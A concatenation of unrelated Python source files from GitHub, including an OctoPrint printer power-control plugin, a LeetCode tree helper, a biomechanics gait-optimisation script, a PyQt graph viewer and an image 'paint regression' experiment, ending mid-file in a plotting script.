return [
dict(type="settings",
name="OctoPiBox Configuration",
custom_bindings=False)
]
def get_api_commands(self):
return dict(autopoweroff=[],
abort=[])
def on_api_command(self, command, data):
import flask
if command == "abort":
self._timer.cancel()
self._timer = None
self._set_status_LED("CONNECTED")
self._logger.info("Automatic Power-Off aborted.")
elif command == "autopoweroff":
self._logger.debug("Automatic Printer Power-off called via API. Starting timer.")
self._start_auto_power_off_timer()
def on_event(self, event, payload):
#self._logger.info("Event triggered: {}".format(event))
if event == Events.PRINT_DONE:
self._octopibox.pin_on(self._printer_button_enable_pin)
if not self._enabled:
self._logger.debug("Print complete. Automatic Printer Power-off is currently DISABLED.")
self._set_status_LED("CONNECTED")
return
if self._timer is not None:
return
self._logger.debug("Print complete. Automatic Printer Power-off is ENABLED. Starting timer.")
self._start_auto_power_off_timer()
elif event == Events.CONNECTED:
self._set_status_LED("CONNECTED")
elif event == Events.DISCONNECTED:
self._set_status_LED("DISCONNECTED")
elif event == Events.PRINT_STARTED:
self._octopibox.pin_off(self._printer_button_enable_pin)
self._set_status_LED("PRINTING")
elif event == Events.PRINT_FAILED:
self._octopibox.pin_on(self._printer_button_enable_pin)
self._set_status_LED("ERROR")
elif event == Events.PRINT_CANCELLED:
self._octopibox.pin_on(self._printer_button_enable_pin)
self._set_status_LED("ERROR")
elif event == Events.CLIENT_OPENED:
self._update_power_status()
def _start_auto_power_off_timer(self):
self._timeout_value = self._settings.get_int(['timer_seconds'])
if (self._timeout_value < 30) | (self._timeout_value > 1800):
self._timeout_value = 600
self._logger.debug("Automatic Printer Power-off started: {} seconds.".format(self._timeout_value))
self._set_status_LED("POWERINGOFF")
self._timer = RepeatedTimer(1, self._timer_task)
self._timer.start()
self._plugin_manager.send_plugin_message(self._identifier, dict(type="timeout", timeout_value=self._timeout_value))
def _load_settings(self):
self._enabled = self._settings.get_boolean(['enabled'])
self._printer_pin = self._settings.get_int(['printer_pin'])
self._spare_pin = self._settings.get_int(['spare_pin'])
self._printer_button_pin = self._settings.get_int(['printer_button_pin'])
self._printer_button_enable_pin = self._settings.get_int(['printer_button_enable_pin'])
self._spare_button_pin = self._settings.get_int(['spare_button_pin'])
self._spare_button_enable_pin = self._settings.get_int(['spare_button_enable_pin'])
self._button_debounce = self._settings.get_int(['button_debounce'])
self._status_red_pin = self._settings.get_int(['status_red_pin'])
self._status_green_pin = self._settings.get_int(['status_green_pin'])
self._status_blue_pin = self._settings.get_int(['status_blue_pin'])
def _timer_task(self):
self._timeout_value -= 1
self._plugin_manager.send_plugin_message(self._identifier, dict(type="timeout", timeout_value=self._timeout_value))
if self._timeout_value <= 0:
self._timer.cancel()
self._timer = None
self._printeroff()
def _powercallbackfunction(self, pin, level, tick):
if pin == self._printer_pin:
self._logger.debug("Printer pin {} level changed to {}".format(pin, level))
self._update_power_status()
if level == 0:
current_connection = self._printer.get_current_connection()
if current_connection[0] != "Closed":
self._logger.debug("Printer connection found: {}".format(current_connection[0:3]))
self._printer.disconnect()
self._logger.debug("Printer disconnected after power-off.")
if self._timeout_value > 0:
self._timer.cancel()
self._timer = None
self._timeout_value = 0
self._plugin_manager.send_plugin_message(self._identifier, dict(type="close_popup"))
elif level == 1:
self._logger.debug("Printer power-on detected.")
self._set_status_LED("CONNECTING")
self._printer.connect()
self._logger.debug("Printer auto-connect after power-on attempted.")
def _printeroff(self):
self._logger.debug("Printer disconnect before power-off.")
self._printer.disconnect()
self._logger.info("Powering off printer on pin {}.".format( self._printer_pin))
self._octopibox.pin_off(self._printer_pin)
self._logger.debug("Powering off spare outlet on pin {}.".format( self._spare_pin))
self._octopibox.pin_off(self._spare_pin)
def _update_power_status(self):
printer_power_status = ["Off", "On"]
printer_power_status_text = printer_power_status[ self._octopibox.pin_value(self._printer_pin)]
self._plugin_manager.send_plugin_message(self._identifier, dict(type="updatePowerStatus", power_status_value=printer_power_status_text))
self._logger.debug("Data message sent from {} for power update to {}.".format(self._identifier, printer_power_status_text))
def _set_status_LED(self, status="DISCONNECTED"):
self._octopibox.clear_status_LED()
if status=="DISCONNECTED":
self._octopibox.set_status_LED_color("YELLOW", "OFF", "OFF")
elif status == "CONNECTED":
self._octopibox.set_status_LED_color("GREEN", "OFF", "OFF")
elif status == "PRINTING":
self._octopibox.set_status_LED_color("RED", "OFF", "OFF")
elif status == "CONNECTING":
self._octopibox.set_status_LED_color("GREEN", "YELLOW", "SLOW")
elif status == "POWERINGOFF":
self._octopibox.set_status_LED_color("RED", "YELLOW", "SLOW")
elif status == "ERROR":
self._octopibox.set_status_LED_color("RED", "OFF", "FAST")
elif status == "OFF":
self._octopibox.set_status_LED_color("OFF", "OFF", "OFF")
else:
self._octopibox.set_status_LED_color("OFF", "OFF", "OFF")
##~~ Softwareupdate hook
def get_update_information(self):
# Define the configuration for your plugin to use with the Software Update
# Plugin here. See https://github.com/foosel/OctoPrint/wiki/Plugin:-Software-Update
# for details.
return dict(
octopibox=dict(
displayName="OctoPiBox Plugin",
displayVersion=self._plugin_version,
# version check: github repository
type="github_release",
user="hcomet",
repo="OctoPrint-OctoPiBox",
current=self._plugin_version,
# update method: pip
pip="https://github.com/hcomet/OctoPrint-OctoPiBox/archive/{target_version}.zip"
)
)
# If you want your plugin to be registered within OctoPrint under a different name than what you defined in setup.py
# ("OctoPrint-PluginSkeleton"), you may define that here. Same goes for the other metadata derived from setup.py that
# can be overwritten via __plugin_xyz__ control properties. See the documentation for that.
__plugin_name__ = "OctoPiBox Plugin"
def __plugin_load__():
global __plugin_implementation__
__plugin_implementation__ = OctoPiBoxPlugin()
global __plugin_hooks__
__plugin_hooks__ = {
"octoprint.plugin.softwareupdate.check_config": __plugin_implementation__.get_update_information
}
| hcomet/OctoPrint-OctoPiBox | octoprint_octopibox/__init__.py | __init__.py | py | 14,443 | python | en | code | 0 | github-code | 90 |
73397775976 | # -*- coding: utf-8 -*-
__author__ = 'gzp'
import json
from copy import copy
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
def get_nodes(self):
if not self:
return []
nodes = [self]
node_vals = []
while nodes:
node = nodes.pop(0)
node_vals.append(node.val)
if node.left:
nodes.append(node.left)
if node.right:
nodes.append(node.right)
return node_vals
class Tree:
def __new__(cls, nodes, *args, **kwargs):
if isinstance(nodes, str):
nodes = json.loads(nodes)
if not nodes:
return None
root = TreeNode(nodes.pop(0))
cls._tree(root, nodes)
return root
@classmethod
def _tree(cls, root, nodes):
tree_nodes = [root]
while nodes and tree_nodes:
tmp = []
for node in tree_nodes:
val = cls._get_first_node(nodes)
if val is not None:
node.left = TreeNode(val)
else:
node.left = None
val = cls._get_first_node(nodes)
if val is not None:
node.right = TreeNode(val)
else:
node.right = None
tmp.append(node.left)
tmp.append(node.right)
tree_nodes = copy(tmp)
return root
@classmethod
def _get_first_node(cls, nodes):
if nodes:
return nodes.pop(0)
else:
return False
if __name__ == '__main__':
t1 = Tree('[3,5,1,6,2,9,8,null,null,7,4]')
print(t1.get_nodes())
t2 = Tree('[3,5,1,6,7,4,2,null,null,null,null,null,null,9,8]')
print(t2.get_nodes())
| elfgzp/Leetcode | utils.py | utils.py | py | 1,967 | python | en | code | 1 | github-code | 90 |
18836851102 | # -*- coding: utf-8 -*-
"""
Created on Sun Aug 12 15:32:57 2018
@author: nikhil
"""
file = open('../bacterial_result.txt', 'r+')
content = file.read()
file.seek(0)
lines = content.split('\n')
line_cnt = len(lines)
avg_per = float(lines[line_cnt - 1].split('=')[1])
file.write(lines[0] + '\tDifference')
diff_sum = 0
cnt = 0
for i in range(1, line_cnt):
l = lines[i].split('\t\t')
if len(l) <= 1:
continue
diff = round(float(l[3]) - avg_per, 3)
# file.write('\n' + lines[i] + '\t\t\t' + str(diff))
file.write('\n')
l.append(diff)
file.write(('{:<15} {:<10} {:<18} {:<15} {:<15}'.format(l[0], l[1], l[2], l[3], l[4])))
diff_sum += diff**2
cnt += 1
SD = round((diff_sum / cnt)**0.5, 3)
file.write('\n\n' + lines[line_cnt-1])
file.write('\nStandard Deviation = ' + str(SD))
file.close()
| nik1806/Plant-leaf-infection-detection | standard_deviation.py | standard_deviation.py | py | 861 | python | en | code | 7 | github-code | 90 |
71954599978 | from time import time
import biorbd_casadi as biorbd
from bioptim import Solver, OdeSolver
from .gait.load_experimental_data import LoadData
from .gait.ocp import prepare_ocp, get_phase_time_shooting_numbers, get_experimental_data
def generate_table(out):
root_path = "/".join(__file__.split("/")[:-1])
# Define the problem -- model path
biorbd_model = (
biorbd.Model(root_path + "/models/Gait_1leg_12dof_heel.bioMod"),
biorbd.Model(root_path + "/models/Gait_1leg_12dof_flatfoot.bioMod"),
biorbd.Model(root_path + "/models/Gait_1leg_12dof_forefoot.bioMod"),
biorbd.Model(root_path + "/models/Gait_1leg_12dof_0contact.bioMod"),
)
# --- files path ---
c3d_file = root_path + "/data/normal01_out.c3d"
q_kalman_filter_file = root_path + "/data/normal01_q_KalmanFilter.txt"
qdot_kalman_filter_file = root_path + "/data/normal01_qdot_KalmanFilter.txt"
data = LoadData(biorbd_model[0], c3d_file, q_kalman_filter_file, qdot_kalman_filter_file)
# --- phase time and number of shooting ---
phase_time, number_shooting_points = get_phase_time_shooting_numbers(data, 0.01)
# --- get experimental data ---
q_ref, qdot_ref, markers_ref, grf_ref, moments_ref, cop_ref, emg_ref = get_experimental_data(data, number_shooting_points, phase_time)
for i, ode_solver in enumerate([OdeSolver.RK4(), OdeSolver.COLLOCATION()]):
biorbd_model = (
biorbd.Model(root_path + "/models/Gait_1leg_12dof_heel.bioMod"),
biorbd.Model(root_path + "/models/Gait_1leg_12dof_flatfoot.bioMod"),
biorbd.Model(root_path + "/models/Gait_1leg_12dof_forefoot.bioMod"),
biorbd.Model(root_path + "/models/Gait_1leg_12dof_0contact.bioMod"),
)
ocp = prepare_ocp(
biorbd_model=biorbd_model,
final_time=phase_time,
nb_shooting=number_shooting_points,
markers_ref=markers_ref,
grf_ref=grf_ref,
q_ref=q_ref,
qdot_ref=qdot_ref,
activation_ref=emg_ref,
nb_threads=8,
ode_solver=ode_solver,
)
solver = Solver.IPOPT()
solver.set_linear_solver("ma57")
solver.set_convergence_tolerance(1e-3)
solver.set_hessian_approximation("exact")
solver.set_maximum_iterations(3000)
solver.set_print_level(0)
# --- Solve the program --- #
tic = time()
sol = ocp.solve(solver=solver)
toc = time() - tic
sol_merged = sol.merge_phases()
out.solver.append(out.Solver("Ipopt"))
out.solver[i].nx = sol_merged.states["all"].shape[0]
out.solver[i].nu = sol_merged.controls["all"].shape[0]
out.solver[i].ns = sol_merged.ns[0]
out.solver[i].ode_solver = ode_solver
out.solver[i].n_iteration = sol.iterations
out.solver[i].cost = sol.cost
out.solver[i].convergence_time = toc
out.solver[i].compute_error_single_shooting(sol)
| s2mLab/BioptimPaperExamples | gait/generate_table.py | generate_table.py | py | 3,001 | python | en | code | 3 | github-code | 90 |
31608430415 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
import copy
import pyqtgraph as pg
import re
from PyQt5 import QtWidgets, uic, QtGui, QtCore
from path_to_path.read_file_dialog import read_file_dialog as dialog
from path_to_path.path_calculation import path_calculation as path_calc
pg.setConfigOption("background", "w")
pg.setConfigOption("foreground", "k")
COLOURS = [QtGui.QColor(QtCore.Qt.red),
QtGui.QColor(QtCore.Qt.green),
QtGui.QColor(QtCore.Qt.blue),
QtGui.QColor(QtCore.Qt.black),
QtGui.QColor(QtCore.Qt.magenta),
]
class GraphView(QtWidgets.QWidget):
def __init__(self, *args, **kwargs):
super(QtWidgets.QWidget, self).__init__(*args, **kwargs)
uic.loadUi(
os.path.join(os.path.split(__file__)[0], "graph_view.ui"),
self)
self.widget_xtrack.showGrid(True, True, 1)
self.widget_xtrack.setTitle('Xtrack graphs')
self.widget_xtrack.setLabel('left', 'Xtrack, (m)')
self.widget_xtrack.setLabel('bottom', 'Time, (h:m:s)')
self.widget_path_to_path.showGrid(True, True, 1)
self.widget_path_to_path.setTitle('Path-to-path graphs')
self.widget_path_to_path.setLabel('left', 'Path-to-path, (m)')
self.widget_path_to_path.setLabel('bottom', 'Time, (h:m:s)')
self.legend_xtrack = pg.LegendItem()
self.legend_xtrack.setParentItem(
self.widget_xtrack.graphicsItem())
self.legend_path_to_path = pg.LegendItem()
self.legend_path_to_path.setParentItem(
self.widget_path_to_path.graphicsItem())
self.names_path_to_path = []
self.plots_path_to_path = []
self.names_xtrack = []
self.plots_xtrack = []
self.dialog = dialog.ReadFileDialog()
self.desc = {'Name': None,
'Short_name': None,
'Message': None,
'System': None,
'Path': None,
'Points': {
'A': {
'X_lat': 0.0,
'Y_lon': 0.0,
'Z_alt': 0.0},
'B': {
'X_lat': 0.0,
'Y_lon': 0.0,
'Z_alt': 0.0}}
}
self.guis = [self.dialog.file_widget_1,
self.dialog.file_widget_2,
self.dialog.file_widget_3,
self.dialog.file_widget_4,
self.dialog.file_widget_5
]
self.items_desc = []
self.pairs = {}
def open_files(self):
if self.names_xtrack or self.names_path_to_path:
[self.legend_xtrack.removeItem(_) for _ in self.names_xtrack]
[self.legend_path_to_path.removeItem(_)
for _ in self.names_path_to_path]
self.names_xtrack = []
self.names_path_to_path = []
self.plots_xtrack = []
self.widget_xtrack.clear()
self.widget_path_to_path.clear()
self.items_desc = []
desc = copy.deepcopy(self.desc)
if QtWidgets.QDialog.Accepted == self.dialog.exec_():
for idx, val in enumerate(self.guis):
if val.lineEdit.text():
desc['Name'] = val.lineEdit.text()
desc['Short_name'] = val.lineEdit_2.text()
desc['Message'] = val.comboBox_calc.currentText()
desc['System'] = val.comboBox_system.currentText()
desc['Points']['A']['X_lat'] = self.str2float(
val.lineEdit_Ax.text())
desc['Points']['A']['Y_lon'] = self.str2float(
val.lineEdit_Ay.text())
desc['Points']['A']['Z_alt'] = self.str2float(
val.lineEdit_Az.text())
desc['Points']['B']['X_lat'] = self.str2float(
val.lineEdit_Bx.text())
desc['Points']['B']['Y_lon'] = self.str2float(
val.lineEdit_By.text())
desc['Points']['B']['Z_alt'] = self.str2float(
val.lineEdit_Bz.text())
self.items_desc.append(desc)
desc = copy.deepcopy(self.desc)
ptp = self.path_to_path_calc(self.items_desc)
description_xt = ""
description_ptp = ""
for i, p in enumerate(ptp):
pen = pg.mkPen(color=COLOURS[i], width=1)
y_xt = p[1].xtrack_AB
x = [(i, t.strftime('%H:%M:%S'))
for i, t in enumerate(p[1].time_AB)]
pw_xt = self.widget_xtrack
pw_xt.setWindowTitle('Path-to-Path')
plot_xt = pw_xt.plot(range(len(y_xt)), y_xt, pen=pen)
pw_xt.getAxis('bottom').setTicks([x])
ran = range(0, len(x), int(len(x) / 10))
dx = [x[v] for v in ran]
pw_xt.getAxis('bottom').setTicks([dx, []])
self.legend_xtrack.addItem(plot_xt, p[0])
self.names_xtrack.append(p[0])
self.plots_xtrack.append(plot_xt)
y_p2p = p[1].p2p_AB
pw_p2p = self.widget_path_to_path
pw_p2p.setWindowTitle('Path-to-Path')
plot_p2p = pw_p2p.plot(range(len(y_p2p)), y_p2p, pen=pen)
x_p2p = x[:-900]
pw_p2p.getAxis('bottom').setTicks([x_p2p])
ran = range(0, len(x_p2p), int(len(x_p2p) / 10))
dx_p2p = [x_p2p[v] for v in ran]
pw_p2p.getAxis('bottom').setTicks([dx_p2p, []])
self.legend_path_to_path.addItem(plot_p2p, p[0])
self.names_path_to_path.append(p[0])
self.plots_path_to_path.append(plot_p2p)
description_xt += str(i + 1) + ') '
description_xt += p[0] + ':'
description_xt += 'Number of points = '
description_xt += str(len(p[1].xtrack_AB)) + '\n'
description_xt += '\tXtrack statistics:' + '\n'
description_xt += '\tMean = ' + str(p[1].xt_mean) + '\n'
description_xt += '\tRMS x 2 = ' + str(p[1].xt_rms) + '\n\n'
description_ptp += str(i + 1) + ') '
description_ptp += p[0] + ':'
description_ptp += 'Number of points = '
description_ptp += str(len(p[1].xtrack_AB)) + '\n'
description_ptp += '\tPath-to-path statistics:' + '\n'
description_ptp += '\tMean = ' + str(p[1].ptp_mean) + '\n'
description_ptp += '\tRMS x 2 = ' + str(p[1].ptp_rms) + '\n\n'
self.plainTextEdit.setPlainText(description_xt)
self.plainTextEdit_2.setPlainText(description_ptp)
def path_to_path_calc(self, items):
paths = [(_['Short_name'], path_calc.PathCalc(_)) for _ in items]
return paths
def str2float(self, val):
if not re.search('[a-zA-Z]+', val):
return float(".".join(val.split(",")))
else:
raise RuntimeError('XYZ should not have letters')
def main():
app = QtWidgets.QApplication(sys.argv)
w = GraphView()
w.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| peace2017/path_to_path | path_to_path/graph_view/graph_view.py | graph_view.py | py | 7,500 | python | en | code | 0 | github-code | 90 |
12654873333 | import numpy as np
from PIL import Image
from functools import partial
import cProfile, pstats, io
from time import time
from tqdm import tqdm, trange
import os
def get_max_beta_for_zero_sxy_and_sxx(mx, my, n):
max_beta = 1.0
for j in range(n):
for a, b in [(mx[j], my[j]), (1-mx[j], 1-my[j])]:
if a != 0:
if b == 0:
return 0.0
else:
m = b / a
if m < max_beta:
max_beta = m
return max_beta
def get_least_squares_paint_regression_coefs(x, y):
'''Returns the least squares regression estimates for the model
y = alpha + beta * x, where x, y, and alpha are n-dimensional vectors
and beta is a scalar.
Parameters:
x: array of shape (m, n): list of example x
y: array of shape (m, n): list of example y
Returns: a tuple (alpha, beta)'''
x = np.array(x)
y = np.array(y)
assert len(x.shape) == len(y.shape) == 2
assert x.shape == y.shape
m, n = x.shape
assert m >= 1
if m == 1:
return y[0], 0.0
mx = x.mean(axis=0)
my = y.mean(axis=0)
sxy = np.mean(x * y) - np.mean(mx * my)
sxx = np.mean(x**2) - np.mean(mx**2)
if np.isclose(sxy, 0, rtol = 0.0, atol=1e-8):
sxy = np.mean((x - mx) * (y - my))
# beta * sxx == sxy
if np.isclose(sxy, 0, rtol = 0.0, atol=1e-8):
if sxx == 0:
# sxy == 0, sxx == 0
# beta can be anything
max_beta = get_max_beta_for_zero_sxy_and_sxx(mx, my, n)
beta = max_beta / 2
else:
# sxy == 0, sxx != 0
# beta must be 0
beta = 0.0
elif sxx == 0:
# sxy != 0, sxx == 0
raise RuntimeError(f"no solution to regression {sxx} {sxy}")
else:
# sxy != 0, sxx != 0
beta = sxy / sxx
alpha = my - beta * mx
return alpha, beta
def test():
# x = np.array([
# [0.3, 0.5, 0.7],
# [0.6, 0.2, 0.1]
# ])
x = np.array([
[1.0, 1.0, 1.0],
[1.0, 1.0, 1.0]
])
y = np.array([
[0.7, 0.4, 0.2],
[0.3, 0.9, 0.5]
])
# y = np.array([
# [0.7, 0.8, 0.9],
# [0.8, 0.5, 0.3]
# ])
# y = 0.6 * np.array([0.5, 0.7, 0.2]) + 0.4 * x
alpha, beta = get_least_squares_paint_regression_coefs(x, y)
print(alpha, beta)
o = 1 - beta
c = alpha / o
print(c, o)
im = Image.open('image-52.jpg')
arr = np.asarray(im) / 255
print(arr.shape)
# arr_reshaped = arr.reshape(-1, 3)
# print(arr_reshaped.shape)
arr2 = alpha + beta * arr
im2_arr = (arr2 * 255).astype(np.uint8)
im2 = Image.fromarray(im2_arr)
im2.save('new_im.png')
def get_circle_brush_boundary(row0, col0, brush_size, m, n):
'''Returns the boundary of a circular brush, in the form of a tuple
(min_row, max_row, row_specs)
where row_specs is a list and row_specs[i] is of the form (min_col, max_col)
where row_specs[i] corresponds to the i'th row of the brush and corresponds
to row min_row + i.
Parameters:
row0: row of center of brush
col0: column of center of brush
brush_size: radius of brush
m: number of rows in image
n: number of columns in image'''
min_row = max(row0 - brush_size, 0)
max_row = min(row0 + brush_size, m - 1)
row_specs = []
for row in range(min_row, max_row + 1):
this_row_brush_radius = np.sqrt(brush_size**2 - (row - row0)**2)
min_col = int(round(col0 - this_row_brush_radius))
min_col = max(0, min_col)
max_col = int(round(col0 + this_row_brush_radius))
max_col = min(n - 1, max_col)
row_specs.append((min_col, max_col))
return min_row, max_row, row_specs
def evaluate_loss_circle_brush(x, arr, painting, curr_loss=None, enforce_brush_regression=False):
row0, col0, brush_size = x
m, n, c = arr.shape
min_row, max_row, row_specs = get_circle_brush_boundary(row0, col0, brush_size, m, n)
rows = range(min_row, max_row + 1)
painting_brush_rows = []
arr_brush_rows = []
for row, (min_col, max_col) in zip(rows, row_specs):
painting_brush_rows.append(painting[row, min_col : max_col + 1])
arr_brush_rows.append(arr[row, min_col : max_col + 1])
painting_brush_pixels = np.concatenate(painting_brush_rows)
arr_brush_pixels = np.concatenate(arr_brush_rows)
alpha, beta = get_least_squares_paint_regression_coefs(painting_brush_pixels, arr_brush_pixels)
if enforce_brush_regression:
o = 1 - beta
if not (0 < o <= 1):
return np.inf, (alpha, beta)
c = alpha / o
if not np.all(np.logical_and(0 <= c, c <= 1)):
return np.inf, (alpha, beta)
if curr_loss is None:
curr_loss = np.sum((painting - arr)**2)
curr_loss -= np.sum((painting_brush_pixels - arr_brush_pixels)**2)
new_painting_brush_pixels = alpha + beta * painting_brush_pixels
curr_loss += np.sum((new_painting_brush_pixels - arr_brush_pixels)**2)
return curr_loss, (alpha, beta)
def apply_circle_brush(painting, row, col, brush_size, alpha, beta):
m, n, c = painting.shape
min_row, max_row, row_specs = get_circle_brush_boundary(row, col, brush_size, m, n)
rows = range(min_row, max_row + 1)
for row, (min_col, max_col) in zip(rows, row_specs):
painting[row, min_col : max_col + 1] = alpha + beta * painting[row, min_col : max_col + 1]
def random_search(loss_func, random_candidate_func, n_samples, init_best_loss=np.inf):
best_loss = init_best_loss
best_x = None
best_info = None
for j in range(n_samples):
x = random_candidate_func()
loss, info = loss_func(x)
if loss < best_loss:
best_loss = loss
best_x = x
best_info = info
return best_x, best_loss, best_info
def random_restart_stochastic_hill_climbing(loss_func, random_candidate_func, neighbor_func, n_samples, n_opt_iter, n_neighbors, stop_if_no_improvement, init_best_loss=np.inf):
best_loss = init_best_loss
best_x = None
best_info = None
for j in range(n_samples):
best_x_iter = random_candidate_func()
best_loss_iter, best_info_iter = loss_func(best_x_iter)
for k in range(n_opt_iter):
best_neighbor = neighbor_func(best_x_iter)
best_neighbor_loss, best_neighbor_info = loss_func(best_neighbor)
for _ in range(n_neighbors - 1):
neighbor = neighbor_func(best_x_iter)
neighbor_loss, neighbor_info = loss_func(neighbor)
if neighbor_loss < best_neighbor_loss:
best_neighbor = neighbor
best_neighbor_loss, best_neighbor_info = neighbor_loss, neighbor_info
if best_neighbor_loss < best_loss_iter:
best_loss_iter = best_neighbor_loss
best_x_iter = best_neighbor
best_info_iter = best_neighbor_info
elif stop_if_no_improvement:
# print(k)
break
if best_loss_iter < best_loss:
best_loss = best_loss_iter
best_x = best_x_iter
best_info = best_info_iter
return best_x, best_loss, best_info
def make_painting(arr, n_iter, min_brush_size, max_brush_size, method='random search', save_every=None, folder_name=None, **opt_kwargs):
'''Creates a painting of the image arr.
Parameters:
arr: numpy array of shape (M, N, C)
where (M, N) are the dimensions of the image
and C is the number of channels.
All values in arr should be between 0 and 1.
n_iter: the number of iterations to run to make the painting
n_iter_opt: number of iterations to run the optimization for each stroke
of the painting
min_brush_size: minimum brush size allowed
max_brush_size: maximum brush size allowed
Returns: an image of the same shape as arr, which is a painting of arr'''
assert len(arr.shape) == 3
m, n, c = arr.shape
painting = np.ones(arr.shape)
def generate_random_candidate():
row = np.random.randint(0, m)
col = np.random.randint(0, n)
# brush_size = np.random.randint(min_brush_size, max_brush_size+1)
log_brush_size = np.random.uniform(np.log(min_brush_size), np.log(max_brush_size))
brush_size = int(round(np.exp(log_brush_size)))
return row, col, brush_size
if method == 'random search':
assert 'n_samples' in opt_kwargs
elif method == 'hill climbing':
n_samples = opt_kwargs['n_samples']
n_opt_iter = opt_kwargs['n_opt_iter']
n_neighbors = opt_kwargs['n_neighbors']
stop_if_no_improvement = opt_kwargs['stop_if_no_improvement']
brush_position_delta = opt_kwargs['brush_position_delta']
brush_size_change_factor = opt_kwargs['brush_size_change_factor']
def get_neighbor(x):
r, c, bs = x
r_new = r + np.random.randint(-brush_position_delta, brush_position_delta + 1)
while not (0 <= r_new < m):
r_new = r + np.random.randint(-brush_position_delta, brush_position_delta + 1)
c_new = c + np.random.randint(-brush_position_delta, brush_position_delta + 1)
while not (0 <= c_new < n):
c_new = c + np.random.randint(-brush_position_delta, brush_position_delta + 1)
log_min_bs, log_max_bs = np.log(bs / brush_size_change_factor), np.log(bs * brush_size_change_factor)
bs_new = int(round(np.exp(np.random.uniform(log_min_bs, log_max_bs))))
while not (min_brush_size <= bs_new <= max_brush_size):
bs_new = int(round(np.exp(np.random.uniform(log_min_bs, log_max_bs))))
return r_new, c_new, bs_new
curr_loss = np.sum((painting - arr)**2)
print(f"Initial loss: {curr_loss}")
if save_every is not None:
assert folder_name is not None
if not os.path.isdir(folder_name):
os.mkdir(folder_name)
pbar = tqdm(total=n_iter)
for i in range(n_iter):
loss_func = partial(evaluate_loss_circle_brush, arr=arr, painting=painting, curr_loss=curr_loss, enforce_brush_regression=True)
if method == 'random search':
best_candidate, best_loss, best_params = random_search(
loss_func, generate_random_candidate, **opt_kwargs, init_best_loss=curr_loss)
elif method == 'hill climbing':
best_candidate, best_loss, best_params = random_restart_stochastic_hill_climbing(
loss_func, generate_random_candidate, get_neighbor, n_samples=n_samples, n_opt_iter=n_opt_iter, n_neighbors=n_neighbors, stop_if_no_improvement=stop_if_no_improvement, init_best_loss=curr_loss)
else:
raise ValueError('parameter "method" must be either "random search" or "hill climbing"')
if best_candidate is not None:
curr_loss = best_loss
best_row, best_col, best_brush_size = best_candidate
best_alpha, best_beta = best_params
apply_circle_brush(painting, best_row, best_col, best_brush_size, best_alpha, best_beta)
desc = f"Iteration {i+1}: Loss {curr_loss:.5g}, row {best_row}, col {best_col}, brush size {best_brush_size}"
else:
desc = f"Iteration {i+1}: Loss {curr_loss:.5g}, could not improve"
if (i+1) % save_every == 0:
fname = os.path.join(folder_name, f'{i+1}.png')
im_arr = (painting * 255).astype(np.uint8)
im = Image.fromarray(im_arr)
im.save(fname)
pbar.set_description(desc)
pbar.update()
pbar.close()
return painting, curr_loss
if __name__ == '__main__':
im = Image.open('image-52.jpg')
arr = np.asarray(im) / 255
# params = {
# 'n_iter': 100_000,
# 'min_brush_size': 1,
# 'max_brush_size': 150,
# 'method': 'random search',
# 'n_samples': 20
# }
params = {
'n_iter': 1000,
'min_brush_size': 1,
'max_brush_size': 30,
'method': 'hill climbing',
'n_samples': 5,
'n_opt_iter': 10,
'n_neighbors': 3,
'stop_if_no_improvement': True,
'brush_position_delta': 60,
'brush_size_change_factor': 1.3
}
# pr = cProfile.Profile()
# pr.enable()
painting_info_string = '_'.join(f'{k}={v}' for k, v in params.items())
t0 = time()
painting, loss = make_painting(arr, save_every=50, folder_name=painting_info_string, **params)
dt = time() - t0
print(f"Time taken: {dt:.6f}s")
# pr.disable()
# s = io.StringIO()
# ps = pstats.Stats(pr, stream=s).sort_stats('cumulative')
# ps.print_stats(20)
# print(s.getvalue())
im2_arr = (painting * 255).astype(np.uint8)
im2 = Image.fromarray(im2_arr)
fname = 'painting_' + painting_info_string + f'_loss={loss:.1f}.png'
im2.save(fname)
| 71c/paint_regression | paint_regression_2.py | paint_regression_2.py | py | 13,174 | python | en | code | 0 | github-code | 90 |
4829184591 | #Exercício Python 105: Faça um programa que tenha uma função notas() que pode receber várias notas de alunos e vai retornar um dicionário com as seguintes informações:
#– Quantidade de notas
#– A maior nota
#– A menor
#– A média da turma
#– A situação (opcional)
def notas(*valor, show=False):
"""
-> Função para analisar notas e situações de vários alunos.
:param valor: Uma ou mais notas dos alunos (aceita várias)
:param show: Valor opcional, indicando se deve ou não adicionar a situação
:return: Dicionário com várias informações sobre e situações da turma.
"""
dicionario = dict()
dicionario['total'] = len(valor)
dicionario['maior'] = max(valor)
dicionario['menor'] = min(valor)
dicionario['media'] = sum(valor)/len(valor)
if show:
if dicionario['media'] >= 7:
dicionario['situacao'] = 'BOA'
elif dicionario['media'] >= 5:
dicionario['situacao'] = 'RAZOAVEL'
else:
dicionario['situacao'] = 'RUIM'
return dicionario
resposta = notas(5.5,2.5,1.5,show=True )
print(resposta)
help(notas) | rodrigojgrande/python-mundo | desafios/desafio-105.py | desafio-105.py | py | 1,166 | python | pt | code | 0 | github-code | 90 |
27807880123 | import math
from typing import Union
from models.base import Processable
class Circle(Processable):
def __init__(
self,
radius: Union[int, float],
diameter: Union[int, float],
square: Union[int, float],
perimeter: Union[int, float],
):
self._radius = radius
self._diameter = diameter
self._square = square
self._perimeter = perimeter
@property
def radius(self) -> Union[int, float]:
if self._radius:
return self._radius
elif self._diameter:
# r = d / 2
self._radius = self._diameter / 2
return self._radius
elif self._square:
# r=√(S/π)
self._radius = math.sqrt(self._square / math.pi)
return self._radius
elif self._perimeter:
# r=L/2π
self._radius = self._perimeter / (2 * math.pi)
return 0
@property
def diameter(self) -> Union[int, float]:
if self._diameter:
return self._diameter
elif self._radius:
# d = 2r
self._diameter = self._radius * 2
return self._diameter
return 0
@property
def square(self) -> Union[int, float]:
if self._square:
return self._square
elif self._radius:
# S=πr²
self._square = math.pi * self._radius**2
return 0
@property
def perimeter(self) -> Union[int, float]:
if self._perimeter:
return self._perimeter
elif self._radius:
# L=2πr
self._perimeter = 2 * math.pi * self._radius
return self._perimeter
return 0
| AlexFoxalt/GeoPymetry | models/circles.py | circles.py | py | 1,718 | python | en | code | 0 | github-code | 90 |
74404983977 | import matplotlib.pyplot as plt
import matplotlib.colors as colors
import numpy as np
import argparse
import ROOT, array, ctypes, datetime
from matplotlib import style
style.use('plt.mplstyle')
def get_unixtime_rms_arrays(bad_run_list, file_list):
unixtimes = []
rms = {}
for c in range(16):
rms[c] = []
runnums = []
for f in file_list:
